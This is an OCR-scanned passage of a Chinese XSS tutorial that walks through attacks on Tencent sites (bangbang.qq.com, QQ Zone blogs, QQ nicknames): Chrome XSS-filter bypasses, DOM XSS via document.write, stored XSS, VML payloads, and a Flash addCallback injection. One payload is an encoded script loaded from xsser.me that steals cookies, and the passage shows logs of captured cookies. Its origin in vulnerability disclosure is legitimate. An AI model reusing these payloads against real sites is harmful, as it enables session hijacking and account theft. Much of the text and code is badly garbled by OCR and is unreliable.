kb Resource linterpreted as Image but transfterred with MIME tvpe image/jpe: " 
和 


有 的 新 手 ， 不 知道 有 过 滤器 的 ， 更 是 会 觉得 “ 啊 ， 这 是 怎么 回 事 ， 怎 么 不 行 啊 ， 明 
明 可 以 的 。。” 我 们 只 要 看 到 console 里 有 上 面 那 句 ， 就 说 明 chrome 的 过 滤器 大 
发 神威 了 1 | 





3. 我 们 也 看 看 源码 。 





《> | bangbang.qgq.com/php/login?game=roco&yuin=" 
TS [ibn 5 二 
[BpX 蕊 28px | pe 

主 

帮 帮 和 精 元 


i 


| | - : 机 Pr 1—=; 
年 人 总 曾 | Resourees 人 Hetwork “二 Soarees CU imel1lne Profiles A hadits | 本 Console 


m1 wmlns="http /www .W300rer 荆 昌 号 号 7 基站 七 而 工 他 

heads,..*< /heads 

body ‘onload concontextmeny="rFeturn Talse"» 

<input type="hidden”" id="egame” vatlie="roco'"s 

*input type="hidden”" id="homepath"™ value="http':/ :banebane.qgq. Com 
entUin" valyey 













d=" si 
<ime src="1” onerrory 
Ee 

In 


LI LI 
1Nou pe="hidden" 








可 以 看 到 ， 过 滤器 把 有 害 的 部 分 干掉 了 。 的 


nnit twrne="hiddsn™T 1d="e Serwvprilami walpB= "rm 


危害 部 分 航 和 谐 了 。 
4. 那么 怎么 绕 过 呢 ? 这 里 直接 说 方法 。 


5. 首先 要 求 缺 陷 点 ， 人 允许 < ，> 。 其 次 ， 要 求 缺陷 点 的 后 方 存 在 </script> 
标签 。 我 们 看 看 当前 的 这 个 点 的 代码 。 


<jnput type="hidden" id="sClientUin" value=""><img Src=1 onerror=a. 


<script type="text/Javascript" src="http://ping]J]s.9qq.com/tcss.ping 








.让 
6. 可 以 看 到 上 面 的 要 求 均 满 足 。 我 们 束 可 以 使 用 以 下 技巧 。 
7. 代入 到 我 们 的 利用 代码 里 。 





http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:, 
团 
这 次 ， 我 们 融 成 功 啦 。 





那些 年 我 们 一 起 学 XSS 





sa EE EE 


' | DB bangbang.qq.com/php/login?game=roco&uin="» <script%20src=data:,alert(1)<!--8world=5&roleid= 





修复 方案 


参见 教程 (1. 什么 都 没 过 滤 的 人 门 情况 ) 


17. XSS 过 滤器 绕 过 [通用 绕 过 ] /8 


18. XSS 过 滤 古 绕 过 [ 银 琐 绕 过 ] 
来 源 : 18. XSS 过 滤器 绕 过 [猥琐 绕 过 ] 
简要 摘 述 


有 些 时 候 ， 通 用 的 绕 过 技巧 并 不 可 行 ， 这 0 环境 ， 
想 想 其 它 办 法 咯 。 "猥琐 绕 过 "与 通用 绕 3 同 的 是 ， 它 通用 性 小 ， 往 往 只 是 特例 。 


详细 说 明 
直接 看 实例 点 : 


http://gqzs.qq.com/qzone/v6/custom/custom module proxy.html#siDomaiti 
El = | 
2. 可 以 看 出 ， 这 是 一 个 DOM XSS 的 后 。 








| 975.:09.com/gqrone/veo/custom/custom nodule proxy htmlsslDeram=l1ea St lelD daaa EE 


i 
pe 
a 


J ments | | Rasourews Qe) Hotwork a ER 人 Profilys 和 第 到 | 量 FEemnsole 


a 
人 ] TT ll 让 让 起 喇 1 " 3 让 名 上 加 EE | tHEm" a 
heads ne 
二 量 生 二 十“ 十 二 ‘CoantenteType” contente text/htel:s charsetaUTF=8™s 


Es > 自 定 ; 人 ‘title’ i 
| et , sp Faran 和 i a 七 让 下 | Era ti Edie: 冉 G EE 太吉 十 本 ”与 生 六 二 并 吉 门 恒 可 古 洱 | CT 
| 上 曲 呈 下 入 疡 出现 nT 和 。” 玉 芭 ] 硬 ”二 入 外 时 必 二 拉 怀 让 攻 


R11f hrer* 


3. 我 们 看 看 源码 。 





var siDomain = paras[| SLDomaln |]， 
g_StyleID = paras['g_StyleID'|.replace("v6/",""); 
if(siDomain.indexof(".gqq.com")>-1){// 防 止 qzs.qq.com 
siDomain = paras|['siDomain'| = "gqzonestyle.gtimg.cn"，; 
上 


document .write('<1link href= http:// +SLIDomalLn+ /qzone_Vv6/gb/yskIn/ :- 


4| | ne 





不 难看 出 ，siDomain 与 g StylelD 都 是 地 址 栏 里 获取 过 来 ， 然 后 通过 
document.write 输出 到 页 面 中 。 4. 利用 先前 教程 的 知识 ， 我 们 不 难 构造 出 利用 代 
码 。 


http://gqzs.qq.com/qzone/v6/custom/custom module proxy.html#siDomaiti 


可 以 看 到 ，IE 下 成 功 弹 出 。 





Tl 下 CE 要 sl i i CW 本 
I A wy 用 


ntmesaDor 7” | OQ 正在 等 宇 qzs. 










来 自 网 页 的 消息 






1 ac=1,004.014: pt suin -BO Pgv pvd=89882413504; 
,coulse -li pgvr cookie=12112270673018: 


ptyui_loginuin= SB ptisp=cnc. RK = 


Uin_coo bie Em 
\ COM 


eulin cookie 
| 远 一 











9DDFAFAS 


5. 但 是 到 了 chrome 下 ， 又 被 拦截 了 。。 


二 人 | | grs.qgq.com/gqzone/ve/custom/custom _ module _ proxy.htmlssiDoman=1a&g. Stylelb 


‘ess rEel= stylesheet /> 


自 定 尺 机 所 内容 载 入 中 ... 






和 
nl 
bE 







"COM 


蚂 Uneaught TypeErrar: Cannet call methed "ndeade” or nyull 


6. 这 个 时 候 怎 么 办 呢 ? 因为 这 里 接受 地 址 栏 的 参数 时 ， 是 以 "=" 分 割 ， 因 而 我 
们 的 代码 中 是 不 允许 携带 等 号 的 。 故 上 一 篇 的 近 巧 不 能 拿 到 这 里 来 使 用 了 ! 


7. chrome 拦截 ， 是 有 一 定 的 拦截 规则 的 ， 只 有 它 觉 得 是 悉 意 代码 的 才 会 去 拦截 。 
这 个 时 候 ， 就 需要 我 们 “观察 地 形 " 啦 | | 我 们 仔细 看 看 这 人 句 。 


g_StyleID = paras['g_StyleID'|.replace("v6/",""); 


8. 不 难看 出 ， 这 里 会 对 g_StyleID 进行 一 次 昔 换 ， 将 v6/ 蔡 换 为 空 。 那 么 如 
果 我 们 的 g_styleID 写 为 下 面 的 情况 


<scrv6/ipt>alert(document.cookie)</script> 


经 过 和 蔡 换 后 ， 融 会 变 成 。 


<script>alert(document.cookie)</script> 


但 是 chrome 并 不 会 把 <scrv6/ipt>alert(document.cookie)</script> 当 作 恶意 的 ， 是 
不 是 融 可 以 绕 过 了 ? 我 们 试 试 。 
http://gqzs.qq.com/qzone/v6/custom/custom module proxy.html#siDomaiti 


果然 可 以 ~ 





屈 9zs.99.com 上 的 网 页 星 示 : 





peedup=sdeh: 
isky_5395 heme_readfeed=1348113948; 
Povrcookre=12101679530693: 


这 样 一 来 ， 我 们 这 个 XSS， 就 不 会 被 浏览 器 的 XSS 过 滤器 所 躁 足 啦 | 


修复 方案 


进入 document.write 前 ， 先 过 滤 下 


19. 存储 型 XSS 入 门 [什么 都 没 过 滤 的 情况 ] 


来 源 : 19. 存储 型 XSS 入 门 [什么 都 没 过 滤 的 情况 ] 


存储 型 和 反射 型 相 比 ， 只 是 多 了 输入 和 存储、 输出 取出 的 过 程 。 简 单 点 说 : 反射 型 
是 : 输入 -- 输 出 ; 

存储 型 是 : 输入 -- 进 入 数据 库 *-- 取 出 数据 库 -- 输 出 。 这 样 一 来 ， 大 家 应 该 注意 到 以 
下 差别 : 

反射 型 是 : 绝 大 部 分 情况 下 ， 输 入 在 哪里 ， 输 出 就 在 哪里 。 

存储 型 是 : 输入 在 A 处 进入 数据 库 ， 而 输出 则 可 能 出 现在 其 它 任 何 用 到 数据 的 地 


O 〇 


反射 型 是 : 输入 大 部 分 位 于 地 址 栏 或 来 自 DOM 的 某 些 属性 ， 也 会 偶尔 有 数据 在 请 
求 中 (POST 类 型 ) 存储 型 是 : 输入 大 部 分 来 自 POST/GET 请 求 ， 曾 见于 一 些 保 
存 操作 中 。 


因而 我 们 找 存 储 型 的 时 候 ， 从 一 个 地 方 输入 数据 ， 需 要 检测 很 多 输出 的 点 ， 从 而 可 

能 会 在 很 多 点 发 现存 储 型 XSS。 至 于 如 何 根 据 输 出 来 构建 存储 型 XSS 的 代码 ， 和 
反射 型 没有 任何 区 别 ， 都 是 看 输出 的 上 下 文 来 进行 。 从 程序 员 过 滤 代 码 的 角度 来 
讲 ， 我 们 给 人 A 之 后 的 教程 走向 分 个 类 : 


1. 数据 需要 过 滤 ， 但 是 未 过 滤 。 导 致 XSS。 比如 : 昵称 、 个 人 资料 。 


2. 业务 需求 使 得 数据 只 能 部 分 过 滤 ， 但 过 滤 规 则 不 完善 ， 逢 绕 过 后 导致 XSS。 比 
如 : 日 志 、 邮件 及 其 它 高 文本 应 用 。 本 节 先 看 一 | 是 该 过 滤 ， 但 是 什 
么 都 没 过 4 滤 的 情 人/ 见 。 


(数据 库 : 不 一 定 是 像 mysql 那样 的 数据 库 ， 只 要 是 能 存储 数据 的 都 算 。) 








详细 说 明 


1. 找 存 储 型 的 时 候 ， 需 要 有 一 颗 多 疑 的 心 ， 一 双 善 于 发 现 的 眼睛 。 我 们 来 看 看 实 
例 ! 


2. 茶 一 天 ， 某 一 群 ， 和 与 菜 一 妹子 有 以 下 对 话 。 


治 你 们 咀 诈 吐 


唱 着 歌 


叶 歌 ? 


抓 泥 误 ? 


沂蒙 山 小 砚 怎 么 样 


兽 。 我 才 开始 学 。 


m 
Le 


孙 了 点 上 来 听 听 。 


莎 会 天 才学 的 |。 概要 听 著 
3. 过 了 一 到， 唤 来 了 这 人 么 一 条 消息 /EN 原来 是 手机 QQ 录 了 发 上 来 的 。 





手机 信者 首 ， 点 击 收 听 httpiWiph. 
207378160051110011 


4. 这 个 时 候 ， 我 们 就 会 想 ， 这 个 发 上 来 的 页 面 会 不 会 有 XSS 呢 ? 
5. 我 们 来 看 看 页 面 的 结构 。 
en 晴晴 时 于 时时 。 “< 一群 名 字 ， 不 是 管理 员 不 可 控 
和 群 志 译 ， 征 十 现 买 。 


9 昵称 音 奉 语 彰 ] 己 孙 





6. 很 多 新 手 在 找 XSS 的 时 候 ， 都 是 拿 看 <script>alert(1)</script> 或 者 其 它 
到 处 测试 ， 很 早 目 不 是 吗 ? 


一 定 要 记 住 本 节 最 开头 的 话 ， 存 储 型 XSS， 输 出 的 位 置 不 一 定 出 现在 输入 的 位 置 。 
7. 因而 我 们 有 时 候 需 要 敢 同 的 思维 ， 来 寻找 存储 型 XSS。 大 概 思 路 如 下 : 

7.1 先 找到 输出 点 ， 然 后 猜测 此 处 输出 是 否 会 彼 过 滤 。 

7.2 如 果 觉 得 可 能 没 过 滤 ， 我 们 再 找到 这 个 输出 是 在 哪里 输入 的 。 

7.3 接着 开始 测试 输入 ， 看 输出 的 效果 。 


7.4 如 果 没 过 滤 ， 那 么 你 就 成 功 了 ， 人 否则 你 可 以 放弃 掉 它 。 
8. 拿 本 例 来 说 明 以 上 过 程 ， 

8.1 我 们 猜测 昵称 这 个 输出 没 过 滤 。 

8.2 找到 输入 点 ， 这 个 输入 点 ， 束 是 修改 QQ 了 昵称。 

8.3 开始 测试 


通过 WEBQQ 修改 昵称 如 下 : (方法 见 : WooYun: PKAV 腾讯 专场 - 3. 腾讯 QQ 客 
户 端 某 处 功能 页 面 存储 型 XSS ) 使 用 charles web proxy 拦截 WEBQQ 数据 包 ， 修 
改 并 提交 。 

局 Charles 3.6.5 - Session + * 


‘File Edit View Proxy Tools Window Help 


一 Cb: 


Name Walue 














mT "cender""fermal 





由 : 国 httpWAt.qstatic,com 
9: | http: As web2,9g9q.com 


0 





A : 必 右键 ; 编辑 

i odify my details2 2 3， 将 眠 称 便 Te 
ed 3 re dih -my_detail COM 
一 4 谍 了 同 尖 这 1 才 - 





8.4 我 们 拿 小 号 进入 一 个 群 ， 发 布 一 条 手机 QQ 的 语音 。 看 输出 效果 ， 没 过 滤 ， 成 
功 了 吧 一 一 


二 
16:41:31 


手机 Qi 雄 瘟 ， 点 击 收听 http:Wiph.ggq. -mn 


TE 





diy class="E Name y=t/ /divy 
by coil classs "more"y /divy 


i 








Classs" Hqnick™» 
上 am 
tsetiptyalerttl tse LpEY|t 


Ee 


拿 xsser.me 在 某 群 的 测试 效果 | 


训 口 地 址 : http/ 永 SSeT.TIe TO 村 站 1 站 有 百 ] 用) 才 志 各 和 才 虑 内容 ) | 六 SoER 


[| ;用 部 时间 接收 的 内 容 Request Headers 

回 ” 禄 开 。” ”2012-1223 * location : httpJph.qq com 和 30 。 HTIP REFERER :http:iiiph.qq.comi204 
17:34:25 

回 + 展开 2012-12-23 » location : http:iiph.qq.com 和 W430 。 HTTP_REFERER :httpiiiph.qq.comi204 
17:32:56 


+ 展开 ”2012-12-23 » location: http:iiph.gqg.com 430 » HTTP_REFERER :httpiiph.qq.comi204 


图 
登录 他 人 帐号 : 





修复 方案 : 
昵称 处 输出 过 滤 。 


20. 存储 型 XSS 入 门 [套现 绕 过 量 文 本 ] 


来 源 : 20. 存储 型 XSS 入 门 [又 现 绕 过 蝇 文 本 ] 


简要 摘 述 

很 多 应 用 含有 富 文 本 内 容 ， 这 类 应 用 最 典型 的 特征 是 具有 编辑 器 ， 例 如 : 博客 日 
志 ， 邮箱 等 。 这 类 应 用 往往 允许 使 用 一 定 的 HTML 代码 。 为 了 在 用 户 体 验 和 安全 
之 间 寻 找平 衡 ， 各 种 厂商 可 能 采用 了 不 尽 相 同 的 办 法 。 但 是 总 体 来 说 ， 有 2 类 。 


1 类 我 们 称 为 白 名 单 ， 即 : 只 人 允许 使 用 白 名 单 内 的 合法 HTML 标签 ， 例 如 
IMG。 其 它 均 剔除 。 例 如 : 百度 贴吧 回帖 时 候 的 代码 过 滤 方 式 。 


2 类 我 们 称 为 黑 名 单 ， 即 : 厂 丙 会 构建 一 个 有 人 危害 的 HTML 标签 、 属 性 列表 ， 然 
后 通过 分 析 用 户 提 交 的 HTML 代码 ， 别 除 其 中 有 害 的 部 分 。 如 : QQ 邮箱 的 发 邮 
件 时 的 过 滤 方 式 。 


白 名 单 要 安全 得 多 ， 而 黑 名 单 的 方式 则 经 常会 眉 绕 过 。 


绕 过 的 技巧 也 有 很 多 ， 我 们 可 以 从 最 疫 技 术 含 量 的 开始 说 起 !! 本 节 将 以 QQ 空 
间 /QQ 校友 的 日 志 功 能 为 例 来 说 明 ， 什 么 是 "套现 绕 过 曙 文本 ”| 


注意 : 本 节 说 的 “套现 ”， 不 是 与 “ 钱 " 有 关 的 ; 在 这 里 的 含义 是 : “套用 现成 的 XSS 代 








码 ”。 
详细 说 明 


1. 新 手 平 时 测试 XSS 时 ， 经 党 会 用 到 <script>alert(1)</script> 到 多 插入， 
看 效果 。 


2 这 种 做 法 ， ee 人 ee 确实 能 而 到 。 但 是 如 果 拿 
到 | QQ 宇 间 日 志 里 去 插入 。 ， 后 未 一 会 很 悲壮 ， 人 彼 过 滤 的 毛 都 没有 了 。 O 


RE 


想 ， 如 果 我 们 找到 一 个 不 在 腾讯 黑 名 单 中 的 XSS 代码 ， 包 不 是 束 可 以 成 功 在 
日 志 里 执行 XSS 了 么 ? 


5. 有 的 人 会 问 了 。。 哪 里 去 找 啊 ?? 方法 有 2 种 : 

5.1 你 足够 牛 ， 目 己 去 发 现 。 

5.2 已 经 有 大 和 牛 为 我 们 准备 了 很 好 的 资料 ， 去 里 面 翻 。 

6. 我 不 够 牛 ， 所 以 我 只 能 去 大 牛 的 资料 里 翻 咯 。 

这 里 我 翻 的 是 @sogili 维护 的 http://html5sec.org/ ， 里 面 有 很 多 哦 


那些 年 我 们 一 起 学 XSS 


HTML5 Securtity Cheatsheet 


Bh br ousar | 





通过 formaction 必 性 进行 X55 - 再 要 用 户 进 行 变 豆 【1) 


这 个 向 量 车 示 了 通过 HTIGL.5 的 foza 和 foraaction 从 外 部 劫持 表单 的 一 种 方法 ， VS5 代 到 
pr 





不 要 让 用 户 提交 包含 Ora 和 fornaction” 属性 的 标 敬 . 诞 免 在 form 中 出 现 id 属 性 及 提交 按 握 . 


. 一 -一 - 人 可 所 适用 的 浏 
wm 亿 卫 七 所 站 DOE .0 = Dpera 10.5 Chrome O00 > | a a 
FiEetox 15.0 画 Qipéra jl 下 a 3; 必 画 时 证 糙 电 攻 二 怀 寺 : 了 





画 a 12.0 


3 
人 NI- 


Rs Html nee Chrome Fitefoxw formactinnt Tadseript buttan 
a httprr wv, whatwe, ora specsr Web apps CuErent—Re + lp aa soclat LOO ort EO} Sh 


7. 然 然后 后 我 束 开 始 按 照 下 面 的 流程 晕 慢 测试 。 
先进 井 QQ 空 间 ， 发 表 一 日 志 ， 然后 编辑 日 志 六 ， | 时 抓 包 。 














Value 
| [qzroferrer http: /ete. qrs.qq.com/gqzone/newblogiv editor,html#brd=: 
|eate EE 


Structure (Sequence | 

[四 评 httpy/ete.qzs.qq, Corm 

已 访 httpij/bl,qzone.qq.com 出 | 上 
由 - 鹿 c9i-biny 用 








入 内 htinl5sec 柑 来 的 Ne3 引 全 码 # 





鼎 J num=158topicl 
已 blog_output_data?uin ep dablogid =135697( 

get_abs?hostUin= pn ii Eb | 
加 med urna de 1809807668 
[ms blog_output_data?uin :Bap blogid=135697! | |hest iin 














入 mod_blog?ref=qzoneBg tk=1809807668 | lak 1809807658 
(mod _ blog?ref=qzoneaa t=1809807668 |ref i 
有 -draft/ json 1 
i faviconiico linCharset gbk 
favicon.ico IeutCharset gbk CC Ou 
着 favicon.ico [format fs 8 sO 
i 三 | Iieouce 1 


修改 抓 包 内 容 后 ， 这 里 修改 的 是 日 志 内 容 。 提 交 修 改 后 的 数据 已 ! 然后 我 们 来 看 看 
日 志 里 的 源 代码 里 ， 我 们 提交 的 XSS 代码 是 否 航 过 滤 。 


20. 存储 型 XSS 入 门 [套现 绕 过 国文 本 |] 87 


本 和 * 闭 划 本 评论 昌 吕 北 辐 首 下 二 界 到 


i 对 字 无 限量 。 全 


EF 慎 用 上 1 名 和 用 苇 挤 

使 用 Windews Liwve 发 送 上 庶子 世 性 

5 使 用 Windews Live 损 写 博客 
dddddddqd 所 有 ji 正如 


于 


右键 ! 查看 掉 代 码 





8. 这 里 我 们 就 不 说 失败 的 了 了， 直接 说 成 功 的 部 分 。 

我 们 提交 以 下 代码 : 

<vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:ur. 
[2 | 
然后 看 看 源 代码 的 输出 : 


Te nie se i ee Ew Ee ee i de rie Te i i mie Te es Bi i ii “is Vi mie Bee oe i et OO ee he i Bi i i a a 





号 工 呈 书证 太守 


TwnNitrame milns="irn' schemasr— 
[wn we "Tehavidr url 
it#wvnl) :position:absolute:width i100%:height: :100%" 
/itsokla.duapp: com/ shouzi .vl#nss" ></ vmlframey 





可 以 看 到 ， 这 个 XSS 代码 完全 没 过 滤 。 
9. 我 们 可 以 看 到 XSS 的 效果 。 妃 标 移 到 日 志 上 ， 即 会 触发 XSS 代码 。 


和 CDocunents umd 5ett,.. | 条 日 志 营 日志 


个 人 中 心 。 我 的 主页 =”: 原 用 =。 贤 扮 





于 转 抽 从 训 二 评论 复制 地 址 泣 钼 一 


营 享 无 限 
“了 正在 响 度 和 你 的 操作 ,请 稍 





来 自 网 更 的 霄 各 








ddqdqdqdadqa 


™ 


COM 


10.1 使 用 代码 前 ， 先 自己 在 本 地 试 下 ， 是 否 能 执行 1 搞 清 楚 你 所 使 用 的 XSS 代码 
的 原理 是 什么 


10.2 搞 清楚 XSS 代码 的 适用 范围 : 如 : 在 什么 浏览 器 的 什么 版 本 之 下 才能 使 用 ， 


是 否 需 要 用 户 交互 等 。 


10.3 注意 平时 对 此 类 代码 的 搜集 与 整理 。 


修复 方案 


过 滤 behavior 和 你 们 修复 邮箱 里 相同 问题 的 方法 一 样 即 可 。 


21. 存储 型 XSS 进 阶 [猜测 规则 ， 利 用 Flash 
addCallback 构造 XSS] 


来 源 : 21. 存储 型 XSS 进 阶 [猜测 规则 ， 利 用 Flash addCallback 构造 XSS] 


有 些 时 候 ， 我 们 拿 现 成 的 XSS 代码 都 不 行 ， 都 彼 过 滤 了 ， 那 么 需要 我 们 对 过 滤 的 
规则 进行 一 定 的 判断 与 猜测 。 然 后 针对 性 的 使 用 一 些 技 巧 来 适应 或 者 绕 过 规则 。 


在 本 例 中 ， 我 们 以 QQ 空间 /QQ 校友 的 日 志 功 能 为 例 ， 通 过 猜测 简单 的 过 滤 规 则 ， 
然后 使 用 含有 addCallback 的 flash， 来 实现 了 存储 型 XSS 的 构造 。 


详细 说 明 : 
1. 前 提 : 本 例 需 在 IE9，IE10 下 进行 。 
2. 我 们 乌云 上 报告 的 一 些 已 有 案例 ， 进 行 了 再 次 测试 。 
(QQ 空间 + 朋友 网 ) 日 志 功 能 存储 型 XSS 
上 例 中 ， 提 到 了 QQ 空间 日 志 并 未 对 object 标签 进行 有 效 的 过 滤 。 
3. 我 们 根据 此 例 中 的 代码 对 过 滤 规 则 进行 测试 : 


<object width="100%" height="100%" align="middle" classid="clsid:d: 
| 
以 上 的 代码 ， 是 可 以 正常 提交 ， 并 且 未 过 滤 的 。 





<object width="100%" height="100%" align="middle" classid="clsid:d: 
El 
而 当 swf 的 域名 不 是 qzs.qq.com 时 候 ， 代 码 将 会 被 过 滤 为 以 下 内 容 。 





<object width="100%" height="100%" align="middle" classid="clsid:d: 
en 
即 地 址 被 去 挥 了 。 
4. 那么 我 们 已 和 类 了 这 个 过 滤 规 则 ， 融 有 2 种 绕 过 的 方式 。 
4.1 找到 一 个 qzs.qq.com 域名 下 存在 缺陷 的 FLASH， 然 后 加 以 利用 。 





此 方法 ， 已 经 在 @gainover 的 WooYun: PKAV 腾 讯 专场 - 6._ (QQ 空间 + 朋友 网 ) 
日 志 功 能 存储 型 XSS 有 所 介绍 了 。 


4.2 利用 Flash 的 addcallback 缺陷 来 构造 存储 型 XSS。 

5. 首先 说 下 flash addcallback 方法 的 基本 原理 。 

根据 flash sdk 里 的 源 代 码 ， 我 们 可 以 得 到 flash addcallback 的 源 代 码 中 有 以 下 代 
码 。 


1f ((((activeX == true)) && (!((objectID == null)))))t{ 
_evalJS(((((" flash addcallback(document.getElementById(\"™" + ( 


| 





public static function addcaliback(functionName:string: tlosure:Function) :voidi 
var WrappercCilosure:* = Myll; 
var functionName:® = TunctionName, 
var Closure:* = CloOsure: 
if tavailableyi 
! MEISt): 
wrapperclosure = Tunction (reguest:string) :stringt 
| Ferurn (Ceallincteclosure, Fegquest)): 


_addcallbacktfunctionName, wrapperClosure): 
ift Ceruactivex =— TrUe)) Ss ECS 一 一 ml D3) , 
: I alibacktdocumerrt. gercE lemenreyidi""” + objectioy + YY mt 


functionName) 人 


} lse { 
| EFFOPF., ThrowErrortError, 2067): 


其 中 objectlID 为 调用 FLASH 的 HTML 标签 的 ID。functionName 则 为 被 JS 所 调 
用 的 函数 名 称 。 


6. 当 我 们 有 以 下 代码 时 : 

<object Id= aaaa ” width="100%" height="100%" align="middle" classi( 
= 
且 http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf 中 存在 一 名 





ExternalIinterface.addcallback("myfunc",funcIinFlash ) ， 


则 有 


objectID="aaaa",; 
functionName="myfunc"， 


代入 上 面 那 句 evalJS 中 ， 则 有 


flash addcallback(document .getELementById( aaaa )， "myfunc"); 


7. 那么 我 们 可 以 想象 一 下 ， 如 果 aaaa 蔡 换 为 aaaa"),alert(1),(" 则 上 面 代 码 


flash addcallback(document.getElementById("aaaa"),alert(1),(™"), 








相左 
fliash_addcallback(document. getE lementById( laaaa }, mwTumE 

/EOE 一 一 一 一 go 小 产 勒 特 4 个 

|<COde> | 

— flash addcallback(document.getEe lementeyId( Baaa  ),alert(l), gt | "myfunc"); 

-< Code> 
8. 且 FLASH 中 ， 确 实 未 对 objectlID 做 任何 过 滤 。 基于 以 上 内 容 ， 我 们 可 以 构建 利 
用 代码 。 


<object id='aaaa"),alert(1),("' width="100%" height="100%" align="r 
classid="clsid:d27cdb6e-ae6d-11icf-96b8-444553540000" type="applicai 


| 下 
我 们 目 己 用 上 面 这 段 代 码 先 在 目 己 网 站 上 测试 下 : 


全 和 hit: ela.dusppcomllesh sddcallbackhim P= GG | 总 itso 


日 口 醒 二 





| 来 和 网 ni | | 





看 ， 果 然 id 里 的 代码 被 执行 了 1 


9. 利用 以 上 原理 ， 接 着 我 们 在 QQ 空间 里 来 做 测试 ， 至 于 FLASH 么 ， 就 是 现成 
的 1 虽然 这 个 FLASH 里 没有 缺陷 ， 但 是 存在 addCallback 的 调用 ， 我 们 就 可 以 站 
接 用 它 。 


<object width="100%" height="100%" align="middle" id="xsstest1i&quoi 
3,112,57,82,121);document.body.appendcCchild(window.s);}})(), (&quot;' 
classid="clsid:d27cdb6e-ae6d-11icf-96b8-444553540000" type="applicai 
VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto. swf"><PARAM 


加 | 





那些 年 我 们 一 起 学 XSS 


发 布 日 志 /CN 使 用 以 上 代码 


EE 本 [有 az。 esl 


邓 村 喜 娃 


re = 











adgqdqadadaa 


输入 也 下 修配 。 切 接 到 FTEL 模 式 。 






abject width="100%" height="100%" alilgn="middle" d= "xsstestI&quot), (function( Ht( twindow.__x) 
window._ x=1;Wwindow.s=document.createElement(Sstring.fromCharCcode 
115,99,114,105,112,116));Wwindow.s.sro=String.fromcharcode 

104,116,116,112,58,47;,47,120,115,115,101,114,46,109,101,47,66,113,112,57,82,121);:document.body.appendchild(window.s);}}) 


{aquot:” classid=" chsid:d?27odb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"> <PPm 
NAME= "Mowie" VALUE="http://qzs.99.com/gzone/client/photo/swf/yphoto.swf’ > =PARAM NAME="Sre" .CCto 
"ALUE="http: /gzs.qg.c0m/gzone/clent/photo/swt /yohoto.swf > <PARAM NAME="AMlowscripthccess” VALUE=" 


10. 当 用 户 访 问 含 有 XSS 代码 的 日 志 后 ， 我 们 可 以 在 xsser.me 查看 所 记录 的 
cookies 内 容 。 


同志 葡 2013-01-01 
1 后 


了 FT Tur pe ne 


HTTP REFERER ;htipibi,grzone.qg.co 
micogt-binibloognewiblog_ output. data?yl 


ra 00d=13567145698 
amip. Styledrm=etc.q20nestiie. gmyg.onita 


各 We: http:Wbt grone.gq.comecyt-binl 
了 7UIn -0 
风 :oio: oi 1356714689&etyledm= cote. 
nestyle qmgaendinadm=dle ss.99.60 






mb&odm=b qzone qqg.comEmode=28nu 
mpemage=136b000g3eed0 218493429 
da5015126p0ropen=GoREstlmeetanp 
=1357040645&0pref=& 己 =5030298 
ddapage=1brefererurshttp 和 3 wear 
Fdcqzs.qr com eaFqone Werappwar 
Howaryi%2aFbloolisthim eanoump 
忠 3D1 号 25pag8 台 30D1825catal6g 和 和 40ll 
sthref=qz0nese=1 

® toplocation ; httpHuser qzone.gq com 
ti = = HashRelreshsn 
ts=Catalog. list 

CDGKE: ac=1.00d01d. plaaguln=60 D08 


i [Te 


mpimgdm=cc qes .99.co0mEampibdms 
bgzone gqg.comtamp.mode=24ampny 
mpearpaoe=158arnp.blogsead=0.21848 
34298956151283rp.property=G0RESa 
mpbrmestamp=13570406486ampg.dpre 
Hx=&ampg k=S0T020094&amp.nages 
18 rnpreterenyrl=http 和 2&2Fcte.q 
38 和 9 和 9 Co 对 2F ng 轴 22FaP 台 2F 国 0g 中 
as [本 IE LE 和 本国 
pageWwtdD1%2icalalogw3Dlisita 





palbls, ble 


有 = a bm TE 


修复 方案 : 

1. 过 滤 object 标签 

2. 设置 allowscriptaccess 为 never ， 即 使 设置 为 sameDomain, 也 可 能 找到 同 域 下 
含有 addCallback 调用 的 FLASH。 
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